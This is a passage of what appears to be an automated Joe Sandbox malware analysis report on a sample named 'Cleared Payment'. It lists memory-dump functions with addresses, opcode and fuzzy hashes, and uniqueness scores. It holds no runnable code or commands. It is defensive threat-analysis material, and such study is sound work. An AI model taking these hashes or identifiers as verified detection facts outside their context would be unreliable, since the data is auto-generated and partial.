                                                            • Source File: 00000004.00000002.3325008676.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_138d000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39d2c75d8c174f47204882022cf8fa4ab38d90581b085d7120166120ea689224
                                                            • Instruction ID: 58cbfcd14cdc8a5682c5744103fa12ba9d16c65f417dbffe9969693a85e1eb03
                                                            • Opcode Fuzzy Hash: 39d2c75d8c174f47204882022cf8fa4ab38d90581b085d7120166120ea689224
                                                            • Instruction Fuzzy Hash: E12134B1504308EFDB15EF54D9C0B26BBA5FB84318F20C66DD90A4B296C37AD847CA62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB6D10 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25b77d0aad824d4e0b2ee1e1cd80b2ac9d838f702edd975a900aef91f862d037
                                                            • Instruction ID: ee7c8c4b6a232fe040090fc9b39a60f250fba35fd5a5d42f1e98c48105adb6d9
                                                            • Opcode Fuzzy Hash: 25b77d0aad824d4e0b2ee1e1cd80b2ac9d838f702edd975a900aef91f862d037
                                                            • Instruction Fuzzy Hash: DC21A271B101199BDF54EB69F8907EDBBB6EB84310F249479D405EB384EA71ED418B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3BC0 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d5235dba093d78aba942644e0444061206b5fcb984a7557ccfce1ffd0325f84
                                                            • Instruction ID: 16062e6f17a651fd2bb86e9e21d9f21bc075934ef8c02f338821c8fabf7cedec
                                                            • Opcode Fuzzy Hash: 9d5235dba093d78aba942644e0444061206b5fcb984a7557ccfce1ffd0325f84
                                                            • Instruction Fuzzy Hash: 6911A572B141298FDB54AA68D8506FE77E6EBC8310B004579C806E7344EE75DC0187D0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB4200 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78f92e2659b6058e2ec050ee709f8ac3fed0e6cc93221dbb2c4741cb41429b8c
                                                            • Instruction ID: e17ba720150655b5d8ac6984e48644079d6fb84aeef5c43765ba4cfe47dab0ca
                                                            • Opcode Fuzzy Hash: 78f92e2659b6058e2ec050ee709f8ac3fed0e6cc93221dbb2c4741cb41429b8c
                                                            • Instruction Fuzzy Hash: 140128B17101110BDB7195BCA44076BB7DBFBCA710F14987EE10ACB396DD90DC424391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3BB0 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a813d2aa9678341ba7342ab24a6aa845e138ac25e4efce7d8ab7b2811067339
                                                            • Instruction ID: c9bdfbca9517a6e4ffb58007725fedb8c038317af5daa001d017a46476e99d0b
                                                            • Opcode Fuzzy Hash: 8a813d2aa9678341ba7342ab24a6aa845e138ac25e4efce7d8ab7b2811067339
                                                            • Instruction Fuzzy Hash: EC01F776B141294BEB94AA68DC507FF77EAEBC9311F045075D406DB384EE65CC0147D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBA300 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32eb5dd87759768676b8023e10400c7644eb584836965cbdeceba24090654cd0
                                                            • Instruction ID: fb9650f8130e86f8220ece73eef75577d0e4c8ec6bae41d13c0de82884c560d3
                                                            • Opcode Fuzzy Hash: 32eb5dd87759768676b8023e10400c7644eb584836965cbdeceba24090654cd0
                                                            • Instruction Fuzzy Hash: CA01B1B1F011124FE776EA68A85076EBBD6EB86710F1098AEE10ACB381DA61DC018380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0138D02B Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3325008676.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_138d000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: 1d2bb004d70770f0072200c21285239f6dbe9c3105ab9594def0b50b523e5b49
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: 2A11BBB5504384CFCB12DF54D9C0B15BBA1FB84318F28C6AAD8494B6A7C33AD44BCB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3880 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37a76f2d8edaa6e15cf8db24439e6939d6b04848b529650c1fba723e8d8bfa08
                                                            • Instruction ID: 91c230b30fb5076982c9d727667c6cfd764376193e89d87c994b6e9577e1afca
                                                            • Opcode Fuzzy Hash: 37a76f2d8edaa6e15cf8db24439e6939d6b04848b529650c1fba723e8d8bfa08
                                                            • Instruction Fuzzy Hash: AB11D3B1D01259AFCB00DF9AD884ADEFFF4FB48310F10812AE918A7200D3B4A554CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB3878 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c008a91e69fc0b311fc9d3b997adb7e7efd0108643fcae0ea98cef6665ae050
                                                            • Instruction ID: 628278b34a861e825361e8aaeb7086c2aeda87dc9fdf7de681e990da08eda9eb
                                                            • Opcode Fuzzy Hash: 2c008a91e69fc0b311fc9d3b997adb7e7efd0108643fcae0ea98cef6665ae050
                                                            • Instruction Fuzzy Hash: 1C21C2B1D01259AFDB00DF9AD984ADEFFB4FF48710F10826AE918A7201D3B46554CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBED69 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7492d01dc5239d84a9b70411e8997b9ef32af0c39703e06ca1c3a5436a960cb
                                                            • Instruction ID: f108fb2542da72cdcd4e73932ce296d710d7a8a06cab732e0bbe5a895deaa22c
                                                            • Opcode Fuzzy Hash: c7492d01dc5239d84a9b70411e8997b9ef32af0c39703e06ca1c3a5436a960cb
                                                            • Instruction Fuzzy Hash: A401DF72B100114BDB71A66CA450BBEB3E6EBC9650F14983DE90AD7340DEA0EC028380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB4210 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 978a39b359da52994cf730fcc9e729ab48e4b2740f8cccadaa7598ff3af6c275
                                                            • Instruction ID: 461f96fe8addb194d8647ebc725069f5ede85b5289d4ea6646d483dd968f488c
                                                            • Opcode Fuzzy Hash: 978a39b359da52994cf730fcc9e729ab48e4b2740f8cccadaa7598ff3af6c275
                                                            • Instruction Fuzzy Hash: DA016DB1B100110BEB6595ADA45476FB3DBFBC9B10F10987AE10AC7385EDA5DC424391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBED78 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43f4ad2339e7cc335aa51f354caf3f94a81b1fb87efe8e343938fea042911a93
                                                            • Instruction ID: 2db6fb6d19fca6311b86dd90cfceb058bbf399e68088d9eeedfb34ee31d86f06
                                                            • Opcode Fuzzy Hash: 43f4ad2339e7cc335aa51f354caf3f94a81b1fb87efe8e343938fea042911a93
                                                            • Instruction Fuzzy Hash: F5018171B100114BDB75A66DA4507BE66D6EBC9650F10A879E50AC7350DDA5EC034381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BBA310 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39e59d26f5eb8ebea29dd3ed4130fbe2597b46ba4145365d10168bc412b0e05e
                                                            • Instruction ID: d9856f3548658e2cb5f95d25676fa4c16b0b0531e162c2bdae09aa58e7ea4047
                                                            • Opcode Fuzzy Hash: 39e59d26f5eb8ebea29dd3ed4130fbe2597b46ba4145365d10168bc412b0e05e
                                                            • Instruction Fuzzy Hash: 080131B1F101114BDB75EA6CD85076EB7D6E785720F10987DE50BC7344DE65EC428780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06BB6469 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 873d5bab203a50f0b24419811573caed0b2738607356a872581fe2e367d0c77a
                                                            • Instruction ID: d880d10fc571034d17bb80039b6db8bf3ee98797611c6a17e578d8c838b01a21
                                                            • Opcode Fuzzy Hash: 873d5bab203a50f0b24419811573caed0b2738607356a872581fe2e367d0c77a
                                                            • Instruction Fuzzy Hash: CBE0D8F2E115459FDF50CE70D9943EE73A5D705204F2058D2D404C7142F1B1DE408340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%